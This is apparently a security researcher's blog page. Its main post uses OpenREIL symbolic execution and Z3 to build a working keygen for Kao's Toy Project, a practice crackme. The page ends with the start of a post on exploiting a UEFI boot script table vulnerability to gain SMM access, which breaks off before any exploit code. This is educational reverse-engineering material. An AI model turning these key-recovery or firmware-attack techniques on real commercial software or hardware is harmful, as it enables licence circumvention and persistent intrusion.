Friday, March 20, 2015

Automated algebraic cryptanalysis with OpenREIL and Z3

One week ago I released my OpenREIL project - open source implementation of well known Reverse Engineering Intermediate Language (REIL). OpenREIL library has much more features than just binary to IR (intermediate representation) translation, you can check documentation to learn how to use it and what it can do. In this blog post I want to demonstrate a practical example of using OpenREIL to solve Kao's Toy Project crackme puzzle with automated algebraic cryptanalysis.

Why to use an intermediate representation


Intermediate representation of binary code is widely used in code analysis tools mostly by following reasons:
  • Binary code is complicated. For example, IA-32 instruction set has more than one thousand of instructions, while OpenREIL has only 23. Obviously, it will be much more easy to write a program that analyzes IR code than machine or assembly code.
  • Binary code has side effects. CPU instructions are usually doing an implicit operations like flags computation, also there's a lot of complex instructions that belongs to CISC or SIMD classes. For example, here is BAP IR representation of add rbx, rax x86 instruction, looks much more complex than original assembly instruction, right?
    addr 0x0 @asm "add %rax,%rbx"
    label pc_0x0
    T_t1:u64 = R_RBX:u64
    T_t2:u64 = R_RAX:u64
    R_RBX:u64 = R_RBX:u64 + T_t2:u64
    R_CF:bool = R_RBX:u64 < T_t1:u64
    R_OF:bool = high:bool((T_t1:u64 ^ ~T_t2:u64) & (T_t1:u64 ^ R_RBX:u64))
    R_AF:bool = 0x10:u64 == (0x10:u64 & (R_RBX:u64 ^ T_t1:u64 ^ T_t2:u64))
    R_PF:bool =
      ~low:bool(let T_acc:u64 := R_RBX:u64 >> 4:u64 ^ R_RBX:u64 in
                let T_acc:u64 := T_acc:u64 >> 2:u64 ^ T_acc:u64 in
                T_acc:u64 >> 1:u64 ^ T_acc:u64)
    R_SF:bool = high:bool(R_RBX:u64)
    R_ZF:bool = 0:u64 == R_RBX:u64
  • There's a lot of different processor architectures at the market. Using of intermediate representation allows you to make your code analysis logic architecturally independent. Currently OpenREIL supports only i386 (please note that it's very early release ☺) but in a near future I'm planning to add x86_64 and ARM as well, it will be relatively easy because all these architectures are supported by VEX (a part of Valgrind which used in OpenREIL).
As you can see, binary to IR translation is definitely a must-have technology for any advanced binary code analysis tool that doing decompilation, deobfuscation or automated vulnerabilities discovery. Without proper IR translation layer it will be horribly hard to implement such things like symbolic execution, abstract interpretation and many others.

Kao's Toy Project


To demonstrate the power of OpenREIL let's solve Kao's Toy Project crackme. The following code is essence of this crackme, it's actually simple stream cipher with 64-bit key:
void expand(u8 out[32], const u8 in[32], u32 x, u32 y)  
{  
    for (u32 i = 0; i < 32; ++i)  
    {  
        out[i] = (in[i] - x) ^ y;

        x = ROL(x, 1);  
        y = ROL(y, 1);  
    }  
}

It accepts 32-byte plain text as in, cipher key as x and y 32-bit unsigned integers, and produces 32-byte ciphered text out. Kao's Toy Project uses installation ID as plain text, serial number entered by user as x and y, and then compares encryption results with hardcoded ciphered text:

To solve the puzzle you need to recover encryption key for given function with the knowledge of plain text and ciphered text. The solution and cipher itself is not so simple as it could be at first look, paper that describes a solving of this puzzle was published by Dcoder in 2012 [PDF]:


First, try to solve the problem by hand a bit to develop a feel of the difficulty of the problem. For any single byte pair of plaintext and ciphertext (pi, ci) it’s quite easy to find 8 bits within the key so that the mapping is correct. In fact, you can choose ANY byte in EBX to subtract, since you can adjust the difference via the xor by the corresponding byte in EDX.
The value of the key for each byte mapping is completely open ended (256 possibilities). But actually choosing a value for the key for that mapping propagates a constraint across the possibilities of the other parts of the key. And this is the beauty of the algorithm.




Later after the publication Rolf Rolles released his own solution of this crackme, he used Satisfiability Modulo Theories (SMT) formula and SMT solver to achieve the solution. The formula does not explicitly take advantage of any aforementioned, known flaw in the cryptosystem, and instead encodes the algorithm literally. Symbolic execution was used to produce the formula automatically. Rolf also made a video demo with detailed explanation of all steps that needed to solve the puzzle (trace generation, trace simplification, SMT constraints generation and solving). Unfortunately Rolf didn't published the full code, but there's enough technical details to understand how his solution works.

Also, in 2013 Georgy Nosenko presented his work "SMT Solvers for Software Security" where BAP was used for Kao's Toy Project automated keygen generation. I believe, that it might be a good tradition among security reserachers to solve this nifty crackme for demonstrating applied use of some code analysis tools or frameworks ☺

Using OpenREIL for symbolic execution


Here is disassembled code of check_serial() function that checks entered key:
.text:004010EC check_serial    proc near
.text:004010EC
.text:004010EC ciphered        = byte ptr -21h
.text:004010EC X               = dword ptr  8
.text:004010EC Y               = dword ptr  0Ch
.text:004010EC
.text:004010EC                 push    ebp
.text:004010ED                 mov     ebp, esp
.text:004010EF                 add     esp, 0FFFFFFDCh
.text:004010F2                 mov     ecx, 20h
.text:004010F7                 mov     esi, offset installation_ID
.text:004010FC                 lea     edi, [ebp+text_ciphered]
.text:004010FF                 mov     edx, [ebp+X]
.text:00401102                 mov     ebx, [ebp+Y]
.text:00401105
.text:00401105 loc_401105:
.text:00401105                 lodsb
.text:00401106                 sub     al, bl
.text:00401108                 xor     al, dl
.text:0040110A                 stosb
.text:0040110B                 rol     edx, 1
.text:0040110D                 rol     ebx, 1
.text:0040110F                 loop    loc_401105
.text:00401111                 mov     byte ptr [edi], 0
.text:00401114                 push    offset text_valid ; "0how4zdy81jpe5xfu92kar6cgiq3lst7"
.text:00401119                 lea     eax, [ebp+text_ciphered]
.text:0040111C                 push    eax
.text:0040111D                 call    lstrcmpA
.text:00401122                 leave
.text:00401123                 retn    8
.text:00401123 check_serial    endp

As you can see, it loads plain text pointer to ESI register at 004010F7 instruction, then instruction 004010FC loads pointer to stack buffer for ciphered text into the EDI register, encryption key entered by user is stored in EDX and EBX registers. Instructions from 00401105 to 0040110F runs 32 encryption cycles for each byte of input data. At the end of the function, at instruction 0040111D, strcmp() is being called to compare computed ciphered text with some reference value text_valid that hardcoded into the binary - entered encryption key is valid when they are equal.

We going to write a program that analyses Kao's binary and generates correct key for given installation ID mostly in the same way like it was done by Rolf. Here is a list of the steps that we need to do:
  1. Translate check_serial() function into REIL, apply some code optimizations to eliminate unused x86 flags computations, etc.
  2. Mark EDX and EBX registers as symbolic, initialize emulator memory with required global variables (text_valid, installation_ID) and run symbolic execution of our function. At the end of the symbolic execution text_ciphered buffer contents will be represented by 32 symbolic expressions (one for each byte) that accepts EDX and EBX variables as input arguments.
  3. Generate SMT constraints for achieved expressions by equating them with bytes of text_valid.
  4. Feed generated constraints to the SMT solver from Microsoft Z3 using z3py API, ask solver to check constraints satisfiability and produce valid input for EDX and EBX.


Let's do the first step with OpenREIL Python API:
from pyopenreil.REIL import *
from pyopenreil.symbolic import *
from pyopenreil.VM import *

from pyopenreil.utils import bin_PE

# VA's of required functions and variables
check_serial = 0x004010EC        
installation_ID = 0x004093A8        

# create translator instance
tr = CodeStorageTranslator(bin_PE.Reader('toyproject.exe'))

# construct data flow graph of check_serial() function
dfg = DFGraphBuilder(tr).traverse(check_serial)

# Run all available code optimizations and update 
# storage with new function code.
dfg.optimize_all(tr.storage)

# print generated IR code
print tr.get_func(check_serial)

Generated IR code:
; sub_004010ec()
; Code chunks: 0x4010ec-0x401125
; --------------------------------
;
; asm: push ebp
; data (1): 55
;
004010ec.00     SUB         R_ESP:32,             4:32,         R_ESP:32
004010ec.01     STM         R_EBP:32,                 ,         R_ESP:32
;
; asm: mov ebp, esp
; data (2): 8b ec
;
004010ed.00     STR         R_ESP:32,                 ,         R_EBP:32
;
; asm: add esp, -0x24
; data (3): 83 c4 dc
;
004010ef.00     ADD         R_ESP:32,      ffffffdc:32,         R_ESP:32
;
; asm: mov ecx, 0x20
; data (5): b9 20 00 00 00
;
004010f2.00     STR            20:32,                 ,         R_ECX:32
;
; asm: mov esi, 0x4093a8
; data (5): be a8 93 40 00
;
004010f7.00     STR        4093a8:32,                 ,         R_ESI:32
;
; asm: lea edi, dword ptr [ebp + 0xffffffdf]
; data (3): 8d 7d df
;
004010fc.00     ADD         R_EBP:32,      ffffffdf:32,         R_EDI:32
;
; asm: mov edx, dword ptr [ebp + 8]
; data (3): 8b 55 08
;
004010ff.00     ADD         R_EBP:32,             8:32,          V_01:32
004010ff.01     LDM          V_01:32,                 ,         R_EDX:32
;
; asm: mov ebx, dword ptr [ebp + 0xc]
; data (3): 8b 5d 0c
;
00401102.00     ADD         R_EBP:32,             c:32,          V_01:32
00401102.01     LDM          V_01:32,                 ,         R_EBX:32
;
; asm: lodsb al, byte ptr [esi]
; data (1): ac
;
00401105.00     LDM         R_ESI:32,                 ,           V_02:8
00401105.01     AND         R_EAX:32,      ffffff00:32,          V_03:32
00401105.02      OR           V_02:8,              0:8,          V_04:32
00401105.03      OR          V_03:32,          V_04:32,         R_EAX:32
00401105.04     ADD         R_ESI:32,       R_DFLAG:32,         R_ESI:32
;
; asm: sub al, bl
; data (2): 2a c3
;
00401106.00     AND         R_EAX:32,            ff:32,           V_00:8
00401106.01     AND         R_EBX:32,            ff:32,           V_01:8
00401106.02     SUB           V_00:8,           V_01:8,           V_02:8
00401106.03     AND         R_EAX:32,      ffffff00:32,          V_05:32
00401106.04      OR           V_02:8,              0:8,          V_06:32
00401106.05      OR          V_05:32,          V_06:32,         R_EAX:32
;
; asm: xor al, dl
; data (2): 32 c2
;
00401108.00     AND         R_EAX:32,            ff:32,           V_00:8
00401108.01     AND         R_EDX:32,            ff:32,           V_01:8
00401108.02     XOR           V_00:8,           V_01:8,           V_02:8
00401108.03     AND         R_EAX:32,      ffffff00:32,          V_04:32
00401108.04      OR           V_02:8,              0:8,          V_05:32
00401108.05      OR          V_04:32,          V_05:32,         R_EAX:32
;
; asm: stosb byte ptr es:[edi], al
; data (1): aa
;
0040110a.00     AND         R_EAX:32,            ff:32,           V_01:8
0040110a.01     STM           V_01:8,                 ,         R_EDI:32
0040110a.02     ADD         R_EDI:32,       R_DFLAG:32,         R_EDI:32
;
; asm: rol edx, 1
; data (2): d1 c2
;
0040110b.00      OR             1f:8,              0:8,          V_01:32
0040110b.01     SHR         R_EDX:32,          V_01:32,          V_02:32
0040110b.02      OR              1:8,              0:8,          V_03:32
0040110b.03     SHL         R_EDX:32,          V_03:32,          V_04:32
0040110b.04      OR          V_04:32,          V_02:32,         R_EDX:32
;
; asm: rol ebx, 1
; data (2): d1 c3
;
0040110d.00      OR             1f:8,              0:8,          V_01:32
0040110d.01     SHR         R_EBX:32,          V_01:32,          V_02:32
0040110d.02      OR              1:8,              0:8,          V_03:32
0040110d.03     SHL         R_EBX:32,          V_03:32,          V_04:32
0040110d.04      OR          V_04:32,          V_02:32,         R_EBX:32
;
; asm: loop -0xa
; data (2): e2 f4
;
0040110f.00     SUB         R_ECX:32,             1:32,         R_ECX:32
0040110f.01      EQ         R_ECX:32,             0:32,           V_03:1
0040110f.02     NOT           V_03:1,                 ,           V_02:1
0040110f.03     JCC           V_02:1,                 ,        401105:32
0040110f.04     JCC              1:1,                 ,        401111:32
;
; asm: mov byte ptr [edi], 0
; data (3): c6 07 00
;
00401111.00     STM              0:8,                 ,         R_EDI:32
;
; asm: push 0x409185
; data (5): 68 85 91 40 00
;
00401114.00     SUB         R_ESP:32,             4:32,         R_ESP:32
00401114.01     STM        409185:32,                 ,         R_ESP:32
;
; asm: lea eax, dword ptr [ebp + 0xffffffdf]
; data (3): 8d 45 df
;
00401119.00     ADD         R_EBP:32,      ffffffdf:32,         R_EAX:32
;
; asm: push eax
; data (1): 50
;
0040111c.00     SUB         R_ESP:32,             4:32,         R_ESP:32
0040111c.01     STM         R_EAX:32,                 ,         R_ESP:32
;
; asm: call 0x1f1
; data (5): e8 ec 01 00 00
;
0040111d.00     SUB         R_ESP:32,             4:32,         R_ESP:32
0040111d.01     STM        401122:32,                 ,         R_ESP:32
0040111d.02     JCC              1:1,                 ,        40130e:32
;
; asm: leave
; data (1): c9
;
00401122.00     STR         R_EBP:32,                 ,          V_00:32
00401122.01     LDM          V_00:32,                 ,         R_EBP:32
00401122.02     ADD          V_00:32,             4:32,         R_ESP:32
;
; asm: ret 8
; data (3): c2 08 00
;
00401123.00     LDM         R_ESP:32,                 ,          V_01:32
00401123.01     ADD         R_ESP:32,             c:32,         R_ESP:32
00401123.02     JCC              1:1,                 ,          V_01:32

Unfortunately current version of OpenREIL still haven't symbolic execution implementation, but it provides API for constructing symbolic expressions and IR code emulation, which is enough to implement symbolic execution on the top of the pyopenreil.VM module with extending of VM.Math, VM.Mem, VM.Reg and VM.Cpu classes.

Normally, each register of VM.Cpu (which is represented by VM.Reg) keeps current value as Python long, but our new class that inherits VM.Reg uses Val object to store register value. It has two fields: Val.val and Val.exp, not None value of val indicates that it's a concrete value (just like a value of real CPU register), None value of val indicates that it's a symbolic value which expression is stored in exp.

Source code of these two classes:
class Val(object):

    def __init__(self, val = UNDEF, exp = None):

        self.val, self.exp = val, exp

    def __str__(self):

        return str(self.exp) if self.is_symbolic() else hex(self.val)

    def is_symbolic(self):

        # check if value is symbolic
        return self.val is None

    def is_concrete(self):

        # check if value is concrete
        return not self.is_symbolic()

    def to_z3(self, state, size):

        #
        # generate Z3 expression that represents this value
        #

        def _z3_size(size):

            return { U1: 1, U8: 8, U16: 16, U32: 32, U64: 64 }[ size ]

        def _z3_exp(exp, size):

            if isinstance(exp, SymVal):

                if state.has_key(exp.name):

                    return state[exp.name]

                else:

                    return z3.BitVec(exp.name, _z3_size(exp.size))                                 

            elif isinstance(exp, SymConst):

                return z3.BitVecVal(exp.val, _z3_size(exp.size))                

            elif isinstance(exp, SymExp):

                a, b = exp.a, exp.b

                assert isinstance(a, SymVal) or isinstance(a, SymConst)
                assert b is None or isinstance(b, SymVal) or isinstance(b, SymConst)
                assert b is None or a.size == b.size                

                a = a if a is None else _z3_exp(a, a.size)
                b = b if b is None else _z3_exp(b, b.size)                     

                # makes 1 bit bitvectors from booleans
                _z3_bool_to_bv = lambda exp: z3.If(exp, z3.BitVecVal(1, 1), z3.BitVecVal(0, 1))

                # z3 expression from SymExp
                ret = { I_ADD: lambda: a + b,
                        I_SUB: lambda: a - b,            
                        I_NEG: lambda: -a,
                        I_MUL: lambda: a * b,
                        I_DIV: lambda: z3.UDiv(a, b),
                        I_MOD: lambda: z3.URem(a, b),
                        I_SHR: lambda: z3.LShR(a, b),
                        I_SHL: lambda: a << b,                     
                         I_OR: lambda: a | b,
                        I_AND: lambda: a & b,
                        I_XOR: lambda: a ^ b,
                        I_NOT: lambda: ~a,
                         I_EQ: lambda: _z3_bool_to_bv(a == b),
                         I_LT: lambda: _z3_bool_to_bv(z3.ULT(a, b)) }[exp.op]()

                size_src = _z3_size(exp.a.size)
                size_dst = _z3_size(size)

                if size_src > size_dst:

                    # convert to smaller value
                    return z3.Extract(size_dst - 1, 0, ret)

                elif size_src < size_dst:

                    # convert to bigger value
                    return z3.Concat(z3.BitVecVal(0, size_dst - size_src), ret)

                else:

                    return ret

            else:

                assert False    

        if self.is_concrete():

            # use concrete value
            return z3.BitVecVal(self.val, _z3_size(size))

        else:

            # build Z3 expression
            return _z3_exp(self.exp, size)


class Reg(VM.Reg):

    def to_symbolic(self):

        # get symbolic representation of register contents
        if self.val.is_concrete():

            # use concrete value
            return SymConst(self.get_val(), self.size)

        else:

            if self.regs_map.has_key(self.name):

                return SymVal(self.regs_map[self.name], self.size)

            # use symbolic value
            return SymVal(self.name, self.size) if self.val.exp is None \
                                                else self.val.exp    

    def get_val(self):

        # get concrete value of the register if it's available
        assert self.val.is_concrete()
        
        return super(Reg, self).get_val(self.val.val)

    def str_val(self):

        return str(self.val.exp) if self.val.is_symbolic() \
                                 else super(Reg, self).str_val(self.val.val)

Example of concrete value initialization:
val = Val(0x1337L)

Example of symbolic value initialization:
val = Val(exp = SymVal('R_EAX', U32) + SymConst(1L, U32))

Engine computes concrete values during IR instructions execution always when it's possible, but when it meets any instruction that accepts a symbolic value as input - result of it's execution will be a symbolic. Handling of most of the IR instructions is implemented in VM.Math class, here is the source code of inherited symbolic class for it:
class Math(VM.Math):

    def eval(self, op, a = None, b = None):

        concrete = True

        a_val = a if a is None else a.val
        b_val = b if b is None else b.val

        # determinate symbolic/concrete operation mode
        if a_val is not None and a_val.is_symbolic(): concrete = False
        if b_val is not None and b_val.is_symbolic(): concrete = False        

        if concrete:

            a_reg = a if a is None else VM.Reg(a.size, a.get_val())
            b_reg = b if b is None else VM.Reg(b.size, b.get_val())

            # compute and return concrete value
            return Val(val = super(Math, self).eval(op, a_reg, b_reg))

        else:

            assert a is not None
            assert op in [ I_STR, I_NOT ] or b is not None            

            # get symbolic representation of the arguments
            a_sym = a if a is None else a.to_symbolic()
            b_sym = b if b is None else b.to_symbolic()

            # make a symbolic expression
            exp = a_sym if op == I_STR else SymExp(op, a_sym, b_sym)

            # return symbolic value
            return Val(exp = exp)

Symbolic version of VM.Mem class is also uses Val objects to represent each byte of emulator's memory. Currently my symbolic memory model is far away from perfect, but in the case of Kao's crackme it's good enough to track values and expressions across the memory reads-writes. Symbolic version of VM.Cpu collects all register value assignments in SSA form and saves them to list that available as VM.Cpu.regs_list field. Here is execution trace of check_serial():
R_EIP_0_0_0 = 0x0
R_DFLAG_0_0_0 = 0x1
R_EAX_0_0_0 = 0x0
R_EBP_0_0_0 = 0x42424242
R_ESP_0_0_0 = 0x12000ff4
R_EIP_0_0_1 = 0x4010ec
R_ESP_4010ec_0_0 = 0x12000ff0L
R_EIP_4010ec_0_0 = 0x4010ecL
R_EIP_4010ec_1_0 = 0x4010edL
R_EBP_4010ed_0_0 = 0x12000ff0L
R_EIP_4010ed_0_0 = 0x4010efL
R_ESP_4010ef_0_0 = 0x12000fccL
R_EIP_4010ef_0_0 = 0x4010f2L
R_ECX_4010f2_0_0 = 0x20L
R_EIP_4010f2_0_0 = 0x4010f7L
R_ESI_4010f7_0_0 = 0x4093a8L
R_EIP_4010f7_0_0 = 0x4010fcL
R_EDI_4010fc_0_0 = 0x12000fcfL
R_EIP_4010fc_0_0 = 0x4010ffL
V_01_4010ff_0_0 = 0x12000ff8L
R_EIP_4010ff_0_0 = 0x4010ffL
R_EDX_4010ff_1_0 = ONE
R_EIP_4010ff_1_0 = 0x401102L
V_01_401102_0_0 = 0x12000ffcL
R_EIP_401102_0_0 = 0x401102L
R_EBX_401102_1_0 = TWO
R_EIP_401102_1_0 = 0x401105L
V_02_401105_0_0 = 0x0
R_EIP_401105_0_0 = 0x401105L
V_03_401105_1_0 = 0x0L
R_EIP_401105_1_0 = 0x401105L
V_04_401105_2_0 = 0x0L
R_EIP_401105_2_0 = 0x401105L
R_EAX_401105_3_0 = 0x0L
R_EIP_401105_3_0 = 0x401105L
R_ESI_401105_4_0 = 0x4093a9L
R_EIP_401105_4_0 = 0x401106L
V_00_401106_0_0 = 0x0L
R_EIP_401106_0_0 = 0x401106L
V_01_401106_1_0 = (R_EBX_401102_1_0 & 0xff)
R_EIP_401106_1_0 = 0x401106L
V_02_401106_2_0 = (0x0 - V_01_401106_1_0)
R_EIP_401106_2_0 = 0x401106L
V_05_401106_3_0 = 0x0L
R_EIP_401106_3_0 = 0x401106L
V_06_401106_4_0 = (V_02_401106_2_0 | 0x0)
R_EIP_401106_4_0 = 0x401106L
R_EAX_401106_5_0 = (0x0 | V_06_401106_4_0)
R_EIP_401106_5_0 = 0x401108L
V_00_401108_0_0 = (R_EAX_401106_5_0 & 0xff)
R_EIP_401108_0_0 = 0x401108L
V_01_401108_1_0 = (R_EDX_4010ff_1_0 & 0xff)
R_EIP_401108_1_0 = 0x401108L
V_02_401108_2_0 = (V_00_401108_0_0 ^ V_01_401108_1_0)
R_EIP_401108_2_0 = 0x401108L
V_04_401108_3_0 = (R_EAX_401106_5_0 & 0xffffff00)
R_EIP_401108_3_0 = 0x401108L
V_05_401108_4_0 = (V_02_401108_2_0 | 0x0)
R_EIP_401108_4_0 = 0x401108L
R_EAX_401108_5_0 = (V_04_401108_3_0 | V_05_401108_4_0)
R_EIP_401108_5_0 = 0x40110aL
V_01_40110a_0_0 = (R_EAX_401108_5_0 & 0xff)
R_EIP_40110a_0_0 = 0x40110aL
R_EIP_40110a_1_0 = 0x40110aL
R_EDI_40110a_2_0 = 0x12000fd0L
R_EIP_40110a_2_0 = 0x40110bL
V_01_40110b_0_0 = 0x1fL
R_EIP_40110b_0_0 = 0x40110bL
V_02_40110b_1_0 = (R_EDX_4010ff_1_0 >> 0x1f)
R_EIP_40110b_1_0 = 0x40110bL
V_03_40110b_2_0 = 0x1L
R_EIP_40110b_2_0 = 0x40110bL
V_04_40110b_3_0 = (R_EDX_4010ff_1_0 << 0x1)
R_EIP_40110b_3_0 = 0x40110bL
R_EDX_40110b_4_0 = (V_04_40110b_3_0 | V_02_40110b_1_0)
R_EIP_40110b_4_0 = 0x40110dL
V_01_40110d_0_0 = 0x1fL
R_EIP_40110d_0_0 = 0x40110dL
V_02_40110d_1_0 = (R_EBX_401102_1_0 >> 0x1f)
R_EIP_40110d_1_0 = 0x40110dL
V_03_40110d_2_0 = 0x1L
R_EIP_40110d_2_0 = 0x40110dL
V_04_40110d_3_0 = (R_EBX_401102_1_0 << 0x1)
R_EIP_40110d_3_0 = 0x40110dL
R_EBX_40110d_4_0 = (V_04_40110d_3_0 | V_02_40110d_1_0)
R_EIP_40110d_4_0 = 0x40110fL
R_ECX_40110f_0_0 = 0x1fL
R_EIP_40110f_0_0 = 0x40110fL
V_03_40110f_1_0 = 0x0
R_EIP_40110f_1_0 = 0x40110fL
V_02_40110f_2_0 = 0x1
R_EIP_40110f_2_0 = 0x40110fL
V_02_401105_0_1 = 0x1
R_EIP_401105_0_1 = 0x401105L
V_03_401105_1_1 = (R_EAX_401108_5_0 & 0xffffff00)
R_EIP_401105_1_1 = 0x401105L
V_04_401105_2_1 = 0x1L
R_EIP_401105_2_1 = 0x401105L
R_EAX_401105_3_1 = (V_03_401105_1_1 | 0x1)
R_EIP_401105_3_1 = 0x401105L
R_ESI_401105_4_1 = 0x4093aaL
R_EIP_401105_4_1 = 0x401106L
V_00_401106_0_1 = (R_EAX_401105_3_1 & 0xff)
R_EIP_401106_0_1 = 0x401106L
V_01_401106_1_1 = (R_EBX_40110d_4_0 & 0xff)
R_EIP_401106_1_1 = 0x401106L
V_02_401106_2_1 = (V_00_401106_0_1 - V_01_401106_1_1)
R_EIP_401106_2_1 = 0x401106L
V_05_401106_3_1 = (R_EAX_401105_3_1 & 0xffffff00)
R_EIP_401106_3_1 = 0x401106L
V_06_401106_4_1 = (V_02_401106_2_1 | 0x0)
R_EIP_401106_4_1 = 0x401106L
R_EAX_401106_5_1 = (V_05_401106_3_1 | V_06_401106_4_1)
R_EIP_401106_5_1 = 0x401108L
V_00_401108_0_1 = (R_EAX_401106_5_1 & 0xff)
R_EIP_401108_0_1 = 0x401108L
V_01_401108_1_1 = (R_EDX_40110b_4_0 & 0xff)
R_EIP_401108_1_1 = 0x401108L
V_02_401108_2_1 = (V_00_401108_0_1 ^ V_01_401108_1_1)
R_EIP_401108_2_1 = 0x401108L
V_04_401108_3_1 = (R_EAX_401106_5_1 & 0xffffff00)
R_EIP_401108_3_1 = 0x401108L
V_05_401108_4_1 = (V_02_401108_2_1 | 0x0)
R_EIP_401108_4_1 = 0x401108L
R_EAX_401108_5_1 = (V_04_401108_3_1 | V_05_401108_4_1)
R_EIP_401108_5_1 = 0x40110aL
V_01_40110a_0_1 = (R_EAX_401108_5_1 & 0xff)
R_EIP_40110a_0_1 = 0x40110aL
R_EIP_40110a_1_1 = 0x40110aL
R_EDI_40110a_2_1 = 0x12000fd1L
R_EIP_40110a_2_1 = 0x40110bL
V_01_40110b_0_1 = 0x1fL
R_EIP_40110b_0_1 = 0x40110bL
V_02_40110b_1_1 = (R_EDX_40110b_4_0 >> 0x1f)
R_EIP_40110b_1_1 = 0x40110bL
V_03_40110b_2_1 = 0x1L
R_EIP_40110b_2_1 = 0x40110bL
V_04_40110b_3_1 = (R_EDX_40110b_4_0 << 0x1)
R_EIP_40110b_3_1 = 0x40110bL
R_EDX_40110b_4_1 = (V_04_40110b_3_1 | V_02_40110b_1_1)

... around 2000 of other items that was skipped,
full trace is here

Symbolic CPU class also has to_z3() method that returns representation of the trace as list of Z3 bit vector expressions.

Now let's write a main function code that connects all of the pieces altogether:
def keygen(kao_binary_path, kao_installation_ID):

    # address of the check_serial() function
    check_serial = 0x004010EC       

    # address of the strcmp() call inside check_serial()
    stop_at = 0x0040111D

    # address of the global buffer with installation ID
    installation_ID = 0x004093A8        

    # load Kao's PE binary
    from pyopenreil.utils import bin_PE        
    tr = CodeStorageTranslator(bin_PE.Reader(kao_binary_path))

    # Construct DFG, run all available code optimizations
    # and update storage with new function code.
    dfg = DFGraphBuilder(tr).traverse(check_serial)
    dfg.optimize_all(tr.storage)        

    print tr.get_func(check_serial)

    # create CPU and ABI
    cpu = Cpu(ARCH_X86)
    abi = VM.Abi(cpu, tr, no_reset = True)   

    # hardcoded ciphered text constant from Kao's binary
    out_data = '0how4zdy81jpe5xfu92kar6cgiq3lst7'
    in_data = ''

    try:

        # convert installation ID into the binary form
        for s in kao_installation_ID.split('-'):
        
            in_data += struct.pack('L', int(s[:8], 16))
            in_data += struct.pack('L', int(s[8:], 16))

        assert len(in_data) == 32

    except:

        raise Exception('Invalid instllation ID string')

    # copy installation ID into the emulator's memory
    for i in range(32):

        cpu.mem.store(installation_ID + i, U8, 
            cpu.mem._Val(U8, 0, ord(in_data[i])))

    ret, ebp = 0x41414141, 0x42424242

    # create stack with symbolic arguments for check_serial()
    stack = abi.pushargs(( Val(exp = SymVal('ARG_0', U32)), \
                           Val(exp = SymVal('ARG_1', U32)) ))

    # dummy return address
    stack.push(Val(ret))

    # initialize emulator's registers
    cpu.reg('ebp', Val(ebp))
    cpu.reg('esp', Val(stack.top))

    # run until stop
    try: cpu.run(tr, check_serial, stop_at = [ stop_at ])
    except VM.CpuStop as e:            

        print 'STOP at', hex(cpu.reg('eip').get_val())
            
        # get Z3 expressions list for current CPU state
        state = cpu.to_z3()
        cpu.dump(show_all = True)                

        # read symbolic expressions for contents of the output buffer
        addr = cpu.reg('eax').val
        data = cpu.mem.read(addr.val, 32)
        
        for i in range(32):

            print '*' + hex(addr.val + i), '=', data[i].exp                  

        # create SMT solver
        solver = z3.Solver()

        for i in range(32):

            # add constraint for each output byte
            solver.add(data[i].to_z3(state, U8) == z3.BitVecVal(ord(out_data[i]), 8))
        
        # solve constraints
        solver.check()

        # get solution
        model = solver.model()

        # get and print serial number
        serial = map(lambda d: model[d].as_long(), model.decls())
        serial[1] = serial[0] ^ serial[1]

        print '\nSerial number: %s\n' % '-'.join([ '%.8X' % serial[0], 
                                                   '%.8X' % serial[1] ])

        return serial

    assert False

My quick and dirty symbolic execution engine isn't perfect, it has certain limitations that makes it unusable for any complex applications: incomplete memory model, very simple symbolic CPU that doesn't support such things like memory writes and jumps with symbolic address, jumps with symbolic condition, etc. Currently I included it into OpenREIL source code tree only as unit test and stand alone test application, but I'm planning to make a proper symbolic execution implementation and API for pyopenreil as well.

To use this keygen you need to build OpenREIL from Git repository, install Microsoft Z3 with Python bindings and run tests/test_kao.py program with your Kao's installation ID as argument:
$ python tests/test_kao.py 97FF58287E87FB74-979950C854E3E8B3-55A3F121A5590339-6A8DF5ABA981F7CE


And win!

It took around one second to perform all of the computations, which is very good.

Curious reader probably will ask me, is it possible to crack any much or less strong crypto algorithm from real world (like AES, for example ☺) in this way? Unfortunately no, SMT solvers are not magic artefacts and they can't curve laws of mathematics.

Friday, February 6, 2015

Exploiting UEFI boot script table vulnerability

Around one month ago, at 31-st Chaos Communication Congress, Rafal Wojtczuk and Corey Kallenberg presented an excellent research: "Attacks on UEFI security, inspired by Darth Venamis's misery and Speed Racer" (video, white paper 1, white paper 2). The main goal of UEFI vulnerabilities discovered by researchers — it's relatively easy way to bypass different platform security measures (BIOS write protection, SMM protection) on wide range of modern motherboards and laptops that available at the market. Usually, such vulnerabilities might be useful at post exploitation phase for infecting a target machine with stealth and persistent BIOS backdoor that can survive operating system reinstallation. Also, disclosed boot script table vulnerability (CERT VU #976132) is very interesting because at this moment it's one of the best publicly known vulnerabilities that allows to get access to the SMM (a high-privileged CPU mode that might be even more powerful, that ring0 or hardware hypervisor).

However, Rafal and Corey haven't released their PoC code which is needed to check your system for UEFI boot script table vulnerability, so, I decided to write a blog post with step by step work log of it's exploitation on my test hardware: Intel DQ77KB motherboard with 7 series Q77 chipset. In theory, all reverse engineering and exploitation steps are also reproducible on any other UEFI compatible motherboard, so you can modify exploit code to add other models support. As for the BIOS_CNTL race condition vulnerability (CERT VU #766164), my motherboard is not vulnerable because it's properly uses SMM_BWP bit.

Also, while reading this post you should remember, that under BIOS I usually mean "PC firmware in general", but not a legacy (pre-UEFI) BIOS. Described attack is irrelevant to legacy BIOS, because in most of the cases it doesn't have appropriate platform security mechanisms at all.

General information


UEFI boot script table is a data structure that used to save platform state during ACPI S3 sleep, when the most of platform components are powered off. Usually this structure located at special nonvolatile storage (NVS) memory region. UEFI code constructs boot script table during normal boot, and interprets it’s entries during S3 resume when platform is waking up from sleep. Attacker, which is able to modify current boot script table contents from the kernel mode of operating system and trigger S3 suspend-resume cycle, can achieve arbitrary code execution at early platform initialisation stage, when some of security features are not initialised or not locked yet. If you haven't seen Rafal and Corey talk — it's a good time to do that.

Official Intel documentation (Intel® Platform Innovation Framework for EFI) is the best starting point to get some information about UEFI S3 resume architecture:


A lot of things from documents above has reference implementation in EDK2 source code . In practice many manufacturers uses they own code, but nevertheless, EDK2 is a great information source which might be helpful for better understanding of some unclear aspects.

Following scheme shows a platform boot path during normal boot, and during S3 resume:

Figure 2-2 from EFI Boot Script Specification.

Firmware reverse engineering is required to exploit this vulnerability because boot script table location and format are vendor-specific. Boot Script Specification defines a set of operations that must be implemented by interpreter, but not a boot script binary format itself:
#define EFI_BOOT_SCRIPT_IO_WRITE_OPCODE                 0x00 
#define EFI_BOOT_SCRIPT_IO_READ_WRITE_OPCODE            0x01 
#define EFI_BOOT_SCRIPT_MEM_WRITE_OPCODE                0x02 
